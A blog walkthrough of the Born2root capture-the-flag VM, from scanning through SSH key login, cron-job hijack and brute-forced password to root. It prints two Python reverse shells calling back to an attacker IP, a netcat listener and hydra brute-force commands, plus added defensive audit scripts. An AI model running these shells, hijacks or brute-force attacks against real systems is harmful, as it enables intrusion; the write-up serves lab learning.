Born2root VM

Information gathering

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:49 EDT
Nmap scan report for 192.168.56.135
Host is up (0.00091s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
46650/tcp open unknown
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds

Ports 22, 80, 111 and 46650 are open; next, version detection.

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap -sT -sV -sC -O -p22,80,111,46650 192.168.56.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:50 EDT
Nmap scan report for 192.168.56.135
Host is up (0.00047s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Secretsec Company
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 46371/udp6 status
| 100024 1 46650/tcp status
| 100024 1 48871/udp status
|_ 100024 1 49219/tcp6 status
46650/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds

Not much of value here; the key points: Debian, OpenSSH 6.7, a robots.txt listing two directories, and Apache httpd 2.4.10.

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap --script=vuln -p22,80,111,46650 192.168.56.135
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 12:15 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.135
Host is up (0.00035s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /files/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /icons/: Potentially interesting folder w/ directory listing
|_ /manual/: Potentially interesting folder
111/tcp open rpcbind
46650/tcp open unknown
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 61.72 seconds

The vuln script scan turned up two additional directories, /icons and /manual.

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 12:27 EDT
Nmap scan report for secretsec.com (192.168.56.135)
Host is up (0.0037s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp closed ntp
135/udp open|filtered msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds

Web penetration testing

The UDP scan yielded nothing. Next, browse the web interface while running directory brute-forcing in parallel. The home page contains company information and people's names; cewl was used to harvest words from it.

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo gobuster dir -u http://192.168.56.135 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,rar,txt,zip,sql
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.135
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: zip,sql,php,rar,txt
[+] Timeout: 10s
===============================================================
2023/08/17 16:18:46 Starting gobuster in directory enumeration mode
===============================================================
/icons (Status: 301) [Size: 316] [--> http://192.168.56.135/icons/]
/files (Status: 301) [Size: 316] [--> http://192.168.56.135/files/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.135/manual/]
/robots.txt (Status: 200) [Size: 57]
/server-status (Status: 403) [Size: 302]
Progress: 1322350 / 1323366 (99.92%)
===============================================================
2023/08/17 16:23:13 Finished
===============================================================

No new information exposed. Continuing with the web interface: robots.txt lists two paths, so check each in turn.

User-agent: *
Disallow: /wordpress-blog
Disallow: /files

It seems we are being taunted, but the image is still worth saving: it looks as if part of it is cut off, so it needs checking.

strings, file, exiftool and binwalk all found nothing unusual (the output is long, so only part of it is shown below).

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ file index.jpeg
index.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100", baseline, precision 8, 850x315, components 3

Modifying the image height
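The checks above (file reporting 850x315, and the suspicion that rows are hidden below the declared height) can be reproduced by walking the JPEG marker segments directly. This is an added example, not code from the original post: it reads height/width from the SOF segment, counts bytes appended after the EOI marker (what binwalk would flag), and rewrites the declared height the way the author did by hand. The bytes in build_sample are a constructed stand-in, not the real index.jpeg.

```python
import struct

# Start-of-frame markers (baseline, progressive, lossless, ...) that carry the dimensions.
SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7, 0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}


def jpeg_summary(data):
    """Walk the marker segments and return the declared height/width from the
    SOF segment, the SOF offset, and how many bytes follow the EOI marker."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos, sof_offset, height, width = 2, None, None, None
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("lost marker sync at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:            # EOI: anything after it is appended data
            return {"height": height, "width": width, "sof_offset": sof_offset,
                    "trailing_bytes": len(data) - (pos + 2)}
        if pos + 4 > len(data):
            raise ValueError("truncated segment header at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if marker in SOF_MARKERS:
            sof_offset = pos
            _precision, height, width = struct.unpack(">BHH", data[pos + 4:pos + 9])
        pos += 2 + length
        if marker == 0xDA:            # SOS: entropy-coded data runs until EOI
            # FF inside scan data is always stuffed (FF00) or an RSTn marker, so this is the real EOI
            eoi = data.find(b"\xff\xd9", pos)
            if eoi < 0:
                raise ValueError("no EOI marker: file is truncated")
            pos = eoi
    raise ValueError("no EOI marker: file is truncated")


def set_declared_height(data, new_height):
    """Return a copy with the SOF height field rewritten (what a CTF player does
    to reveal image rows hidden below the declared height)."""
    sof = jpeg_summary(data)["sof_offset"]
    if sof is None:
        raise ValueError("no SOF segment found")
    return data[:sof + 5] + struct.pack(">H", new_height) + data[sof + 7:]


def build_sample(height, width, trailing=b""):
    """Constructed minimal JPEG-shaped byte string (SOI, APP0, SOF0, SOS, a few
    entropy bytes with one FF00 stuffing, EOI). Not a decodable picture."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sof0 = b"\xff\xc0" + struct.pack(">HBHHB", 17, 8, height, width, 3) + b"\x01\x22\x00\x02\x11\x01\x03\x11\x01"
    sos = b"\xff\xda" + struct.pack(">HB", 12, 3) + b"\x01\x00\x02\x11\x03\x11\x00\x3f\x00"
    return b"\xff\xd8" + app0 + sof0 + sos + b"\x12\x34\xff\x00\x56" + b"\xff\xd9" + trailing


if __name__ == "__main__":
    img = build_sample(315, 850, trailing=b"appended payload")
    print(jpeg_summary(img))
    print(jpeg_summary(set_declared_height(img, 600))["height"])
```

On a real file, read it with open(path, "rb").read() and pass the bytes to jpeg_summary; a non-zero trailing_bytes count is the cheapest hint that something was appended to the picture.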

Private key leak

I also tried a reverse image search for the original, again with no result; perhaps the picture is simply like that. Directory brute-forcing wordpress-blog turned up nothing either. On to the other directories.

This one looks odd; download it and take a look.

It looks like a private key. Write it to a local file, set its permissions to 600 and try logging in over ssh. For the username, the home page showed a contact's email name, so start with that.

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo ssh -i privatekey martin@192.168.56.135
[sudo] password for kali:
The authenticity of host '192.168.56.135 (192.168.56.135)' can't be established.
ED25519 key fingerprint is SHA256:y7AzR/QI4CJW3DLNEfBYopBbKkUP12PZv3vt+1ZQP6E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.135' (ED25519) to the list of known hosts.
sign_and_send_pubkey: no mutual signature supported
martin@192.168.56.135's password:

Permission denied, please try again.
martin@192.168.56.135's password

Still prompted for a password, but this looks like an algorithm mismatch: sign_and_send_pubkey: no mutual signature supported. Try searching for that message.

Some digging turned up the answer, but the better approach here is to run ssh with verbose output and analyse the debug lines. The cause: the client (OpenSSH 8.8 and later) no longer offers the SHA-1-based ssh-rsa signature algorithm by default, while this OpenSSH 6.7 server only understands that algorithm for RSA keys, so the client has to be told to accept it explicitly.

debug1: Next authentication method: publickey
debug1: Trying private key: privatekey
sign_and_send_pubkey: no mutual signature supported
debug2: we did not send a packet, disable method
debug1: Next authentication method: password
martin@192.168.56.135's password:
┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i privatekey martin@192.168.56.135

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 9 20:31:29 2017 from 192.168.0.42

READY TO ACCESS THE SECRET LAB ?

secret password : ^CTraceback (most recent call last):
File "/var/tmp/login.py", line 8, in <module>
password = raw_input("secret password : ")
KeyboardInterrupt
martin@debian:~$ whoami
martin
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groupes=1001(martin)
martin@debian:~$ w
00:28:02 up 6:43, 1 user, load average: 0,00, 0,01, 0,08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
martin pts/0 192.168.56.106 00:26 1.00s 0.05s 0.00s w
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groupes=1001(martin)
martin@debian:~$ sudo -l
-bash: sudo : commande introuvable
martin@debian:~$ uname -a
Linux debian 3.16.0-4-586 #1 Debian 3.16.39-1+deb8u2 (2017-03-07) i686 GNU/Linux
martin@debian:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:81:98:42 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.135/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe81:9842/64 scope link
valid_lft forever preferred_lft forever
martin@debian:~$ ls -alih
total 28K
128334 drwxr-xr-x 3 martin martin 4,0K juin 8 2017 .
128262 drwxr-xr-x 5 root root 4,0K juin 9 2017 ..
128341 -rw------- 1 martin martin 613 août 18 00:28 .bash_history
128335 -rw-r--r-- 1 martin martin 220 juin 7 2017 .bash_logout
128337 -rwx--x--x 1 martin martin 3,5K juin 7 2017 .bashrc
128336 -rw-r--r-- 1 martin martin 675 juin 7 2017 .profile
128338 drwxr-xr-x 2 root root 4,0K juin 7 2017 .ssh

It asked for a password; I reflexively hit Ctrl+C and it threw a traceback. It looks like a Python script that is run automatically at login, but it does not seem very useful.

martin@debian:~$ cat .bash_history 
nano /var/tmp/login.py
nano .bashrc
ls
ls -ah
sudo su
exit
nano /var/tmp/login.py
clear
nano /var/tmp/login.py
su root
ls
su root
clear
su root
clear
cd /var/www/html/icons/
ls
mv VdXAsOKisAOIO.txt.png key.txt.png
su root
su roo
su root
exit
ls
su root
exit
logout

Let's look at /var/tmp/login.py.

martin@debian:~$ ls -laih /var/tmp/login.py
55 -r-x------ 1 martin martin 263 juin 8 2017 /var/tmp/login.py
martin@debian:~$ cat /var/tmp/login.py
#!/usr/bin/python

import os

print("")
print("READY TO ACCESS THE SECRET LAB ? ")
print("")
password = raw_input("secret password : ")

if (password) == "secretsec" or "secretlab" :
    print("WELCOME ! ")
else:
    print("GET OUT ! ")
    os.system("pkill -u 'martin'")

The script looks rather broken, especially the condition in the middle: if (password) == "secretsec" or "secretlab" is always true, so whatever the user types gets them in.
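An added example, not part of the original post, that puts the login.py bug beside the corrected comparison and adds a small ast-based check that finds the same pattern (an and/or with a bare literal operand) anywhere in Python source, which goes a step beyond the single line discussed above. LOGIN_PY is a constructed copy of the relevant lines of the VM's script.

```python
import ast

# Constructed copy of the relevant lines of /var/tmp/login.py (Python 2 on the VM,
# but the syntax parses fine with Python 3's ast module).
LOGIN_PY = '''\
import os
password = raw_input("secret password : ")
if (password) == "secretsec" or "secretlab" :
    print("WELCOME ! ")
else:
    print("GET OUT ! ")
    os.system("pkill -u 'martin'")
'''


def vulnerable_check(password):
    """Same condition as login.py. Python groups it as
    (password == "secretsec") or ("secretlab"); a non-empty string is truthy."""
    return password == "secretsec" or "secretlab"


def fixed_check(password):
    """Explicit membership test: true only for the two accepted values."""
    return password in ("secretsec", "secretlab")


def literal_boolean_operands(source):
    """Line numbers of and/or expressions that have a bare literal operand.
    That shape is almost always the precedence mistake seen in login.py."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.BoolOp) and any(isinstance(v, ast.Constant) for v in node.values):
            hits.append(node.lineno)
    return hits


def audit(samples):
    """Run both checks over sample inputs: (input, buggy_result, fixed_result)."""
    return [(p, bool(vulnerable_check(p)), fixed_check(p)) for p in samples]


if __name__ == "__main__":
    print("suspicious lines:", literal_boolean_operands(LOGIN_PY))
    for row in audit(["secretsec", "secretlab", "anything else"]):
        print(row)
```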

Its permissions are not interesting either. Collect the two passphrases from the script anyway; they might be reused elsewhere. Tried su with each of them as the password, but both failed.

martin@debian:/home$ ls -laih
total 20K
128262 drwxr-xr-x 5 root root 4,0K juin 9 2017 .
2 drwxr-xr-x 21 root root 4,0K avril 26 2017 ..
141088 drwxr-xr-x 3 hadi hadi 4,0K juin 5 2017 hadi
141985 drwx------ 2 jimmy jimmy 4,0K juin 9 2017 jimmy
128334 drwxr-xr-x 3 martin martin 4,0K juin 8 2017 martin

There are three users under /home; only hadi's directory is readable.

martin@debian:/home/hadi$ ls -alih
total 60K
141088 drwxr-xr-x 3 hadi hadi 4,0K juin 5 2017 .
128262 drwxr-xr-x 5 root root 4,0K juin 9 2017 ..
141089 -rw-r--r-- 1 hadi hadi 220 avril 26 2017 .bash_logout
141091 -rw-r--r-- 1 hadi hadi 3,5K avril 26 2017 .bashrc
128327 -rwxr-xr-x 1 root root 5,3K mai 10 2017 buff
141549 -rw-r--r-- 1 root root 1,1K mai 10 2017 buff.c
128332 -rw-r--r-- 1 root root 148 juin 5 2017 example.c
128329 -rw------- 1 root root 2,1K juin 5 2017 .gdb_history
128340 -rwxr-xr-x 1 root root 5,9K juin 5 2017 overflow
128328 -rw-r--r-- 1 root root 19 mai 10 2017 peda-session-buff.txt
128333 -rw-r--r-- 1 root root 5 juin 5 2017 peda-session-overflow.txt
141090 -rw-r--r-- 1 hadi hadi 675 avril 26 2017 .profile
141097 drwxr-xr-x 2 hadi hadi 4,0K mai 1 2017 .ssh

A buffer overflow? But the binary is not SUID, so I do not see how it would help. Still, a chance to brush up on debugging buffer overflows on Linux.

Privilege Escalation in Linux via a Local Buffer Overflow | by Ravishanka Silva | Medium

Memory layout when the input is 260 A's

The boxed region is where testing showed the pointer ends up pointing.

Starting program: /home/hadi/overflow $(python2 -c 'print "A"* 236 +"B"*24')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

Just a brief note; in practice this program's vulnerability cannot be used for privilege escalation.

Privilege escalation via a cron job

Next I checked the permissions on sensitive files, the folders under the web root, cron jobs and SUID binaries.

martin@debian:/home/hadi$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py

The user jimmy's cron job runs every five minutes, but /tmp is cleared on every reboot, so we can create our own Python reverse-shell file with the same name.
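The defender's view of the same finding, as an added example that is not part of the original post: parse the system crontab and flag every job whose command references a path in a world-writable directory, noting when the file does not exist yet. SAMPLE_CRONTAB is a constructed sample modelled on the crontab above, and stat_fn is injectable so the check can run offline.

```python
import os
import stat

# Constructed sample modelled on the VM's /etc/crontab (system format: m h dom mon dow user command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 * * * * jimmy python /tmp/sekurity.py
"""

# Directories every local user can write to; a missing file there can be planted by anyone.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_system_crontab(text):
    """Return one dict per job line: schedule, user, command."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                     # blank, comment, or VAR=value line
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        jobs.append({"schedule": " ".join(fields[:5]), "user": fields[5], "command": fields[6]})
    return jobs


def absolute_paths(command):
    """Absolute paths mentioned in a command string (interpreter arguments included)."""
    cleaned = command.replace("&&", " ").replace("||", " ").replace("(", " ").replace(")", " ")
    return [tok for tok in cleaned.split() if tok.startswith("/")]


def file_risk(path, stat_fn=os.stat):
    """Why a path is dangerous as a cron target, or None if it looks fine."""
    if path.startswith(WORLD_WRITABLE_DIRS):
        try:
            stat_fn(path)
        except FileNotFoundError:
            return "in a world-writable directory and missing (can be planted)"
        return "in a world-writable directory"
    try:
        st = stat_fn(path)
    except FileNotFoundError:
        return None
    if st.st_mode & stat.S_IWOTH:
        return "world-writable file"
    return None


def find_risky_jobs(jobs, stat_fn=os.stat):
    """(user, path, reason) for every path in a job that file_risk objects to."""
    findings = []
    for job in jobs:
        for path in absolute_paths(job["command"]):
            reason = file_risk(path, stat_fn)
            if reason:
                findings.append((job["user"], path, reason))
    return findings


if __name__ == "__main__":
    for finding in find_risky_jobs(parse_system_crontab(SAMPLE_CRONTAB)):
        print("%s runs %s: %s" % finding)
```

The fix on the VM side is the obvious one: keep the script in a root-owned directory such as /usr/local/bin rather than /tmp. Run the same check with open("/etc/crontab").read() on a real host.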

# Python 2 script (tuple-unpacking parameters, str sockets); the target's "python" is Python 2.
# Set the host and the port.
HOST = "192.168.56.106"
PORT = 443

def connect((host, port)):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    return s

def wait_for_command(s):
    data = s.recv(1024)
    if data == "quit\n":
        s.close()
        sys.exit(0)
    # the socket died
    elif len(data)==0:
        return True
    else:
        # do shell command
        proc = subprocess.Popen(data, shell=True,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        s.send(stdout_value)
        return False

def main():
    while True:
        socket_died=False
        try:
            s=connect((HOST,PORT))
            while not socket_died:
                socket_died=wait_for_command(s)
            s.close()
        except socket.error:
            pass
        time.sleep(5)

if __name__ == "__main__":
    import sys,os,subprocess,socket,time
    sys.exit(main())
martin@debian:/tmp$ vi x.py 
martin@debian:/tmp$ chmod +x x.py
# Ran it directly first to confirm the reverse shell works, then renamed it to match the cron job
martin@debian:/tmp$ mv x.py sekurity.py

However, the reverse shell runs under sh, and trying to upgrade it with python hangs.

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.135] 36957
whoami
jimmy
id
uid=1002(jimmy) gid=1002(jimmy) groupes=1002(jimmy)
ls
networker
pwd
/home/jimmy
ls -liah
total 32K
141985 drwx------ 2 jimmy jimmy 4,0K juin 9 2017 .
128262 drwxr-xr-x 5 root root 4,0K juin 9 2017 ..
141984 -rw-r--r-- 1 root root 16 juin 9 2017 .bash_history
141986 -rw-r--r-- 1 jimmy jimmy 220 juin 8 2017 .bash_logout
141988 -rw-r--r-- 1 jimmy jimmy 3,5K juin 8 2017 .bashrc
141996 -rwsrwxrwx 1 root root 7,4K juin 9 2017 networker
141987 -rw-r--r-- 1 jimmy jimmy 675 juin 8 2017 .profile
cat .bash_history
wget localhost

networker is SUID; strings shows that echo is the only command it does not call by absolute path. But PATH cannot be modified from this flaky shell, so try a different Python reverse shell.

from os import dup2
from subprocess import call
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.106",443))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
call(["/bin/bash","-i"])
jimmy@debian:~$ echo $SHELL
echo $SHELL
/bin/sh
jimmy@debian:~$ export PATH=.:$PATH
export PATH=.:$PATH
jimmy@debian:~$ export
export
declare -x HOME="/home/jimmy"
declare -x LANG="fr_FR.UTF-8"
declare -x LOGNAME="jimmy"
declare -x LS_COLORS=""
declare -x OLDPWD
declare -x PATH=".:/home/jimmy:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin"
declare -x PWD="/home/jimmy"
declare -x SHELL="/bin/sh"
declare -x SHLVL="1"

PATH updated successfully; now try the substitution.

jimmy@debian:~$ echo "/bin/bash" >echo    
echo "/bin/bash" >echo
jimmy@debian:~$ chmod +x echo
chmod +x echo

But it did not work; echo does not seem to be affected by the environment variable.

Right, I forgot that echo is a shell builtin, so sh never consults PATH for it. Next I went through the SUID binaries and more enumeration.

jimmy@debian:~$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
20871 96 -rwsr-xr-x 1 root root 96760 août 13 2014 /sbin/mount.nfs
3589 28 -rwsr-xr-x 1 root root 26344 mars 30 2015 /bin/umount
3588 36 -rwsr-xr-x 1 root root 34684 mars 30 2015 /bin/mount
13038 40 -rwsr-xr-x 1 root root 38868 févr. 24 2017 /bin/su
141996 8 -rwsrwxrwx 1 root root 7496 juin 9 2017 /home/jimmy/networker
20118 1060 -rwsr-xr-x 1 root root 1085300 janv. 7 2017 /usr/sbin/exim4
20945 96 -rwsr-sr-x 1 root mail 96192 févr. 11 2015 /usr/bin/procmail
11741 44 -rwsr-xr-x 1 root root 43576 févr. 24 2017 /usr/bin/chsh
11740 52 -rwsr-xr-x 1 root root 52344 févr. 24 2017 /usr/bin/chfn
11743 80 -rwsr-xr-x 1 root root 78072 févr. 24 2017 /usr/bin/gpasswd
11744 52 -rwsr-xr-x 1 root root 53112 févr. 24 2017 /usr/bin/passwd
19869 52 -rwsr-sr-x 1 daemon daemon 50644 sept. 30 2014 /usr/bin/at
13045 40 -rwsr-xr-x 1 root root 38740 févr. 24 2017 /usr/bin/newgrp
20914 552 -rwsr-xr-x 1 root root 562536 juil. 22 2016 /usr/lib/openssh/ssh-keysign
20200 356 -rwsr-xr-- 1 root messagebus 362672 nov. 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
2048 12 -rwsr-xr-x 1 root root 9468 mars 28 2017 /usr/lib/eject/dmcrypt-get-device

All failed. Somewhat frustrating; let's use linpeas to help enumerate, but wget, curl, gcc and the like turn out to be blocked.

jimmy@debian:~$ wget
wget
HAHA ... Nope

It does not look like rbash; perhaps the author hooked certain system calls.

So upload the file with scp instead.

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ scp -o PubkeyAcceptedKeyTypes=ssh-rsa -i privatekey /home/kali/tools/internal\ information/linpeas.sh martin@192.168.56.135:/tmp
linpeas.sh

But nothing in the linpeas output gave me a lead, and with gcc unavailable too, I was out of ideas.

SSH password brute-forcing

I checked the walkthrough and did not expect it to be this crude (because of all the user switching, I kept assuming each newly obtained user had some special privilege or could read some special file; it turned out to be plain brute force).

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ cat /usr/share/wordlists/rockyou.txt | grep hadi >hadipasswd

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo hydra -l hadi -P hadipasswd 192.168.56.135 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 12:30:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1581 login tries (l:1/p:1581), ~99 tries per task
[DATA] attacking ssh://192.168.56.135:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 1416 to do in 00:09h, 15 active
[22][ssh] host: 192.168.56.135 login: hadi password: hadi123
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 12:32:27

Still, a trick learned: the wordlist was built from the rockyou.txt entries that share a substring with the username; alternatively, cupp -i can generate a wordlist from details about the user.

Password reuse

Finally, try su to root with the same password: success.

hadi@debian:/home$ su
Mot de passe :
root@debian:/home# cd /root
root@debian:~# ls
flag.txt
root@debian:~# cat flag.txt

,-----. ,---. ,------. ,--.
| |) /_ ,---. ,--.--.,--,--, '.-. \| .--. ' ,---. ,---. ,-' '-.
| .-. \| .-. || .--'| \ .-' .'| '--'.'| .-. || .-. |'-. .-'
| '--' /' '-' '| | | || |/ '-.| |\ \ ' '-' '' '-' ' | |
`------' `---' `--' `--''--''-----'`--' '--' `---' `---' `--'


Congratulations ! you pwned completly Born2root's CTF .

I hope you enjoyed it and you have made Tea's overdose or coffee's overdose :p

I have blocked some easy ways to complete the CTF ( Kernel Exploit ... ) for give you more fun and more knownledge ...

Pwning the box with a linux binary misconfiguration is more fun than with a Kernel Exploit !

Enumeration is The Key .



Give me feedback :[FB] Hadi Mene

Born2root VM
https://i3eg1nner.github.io/2023/08/f7491954730f.html
Author: I3eg1nner
Published: 20 August 2023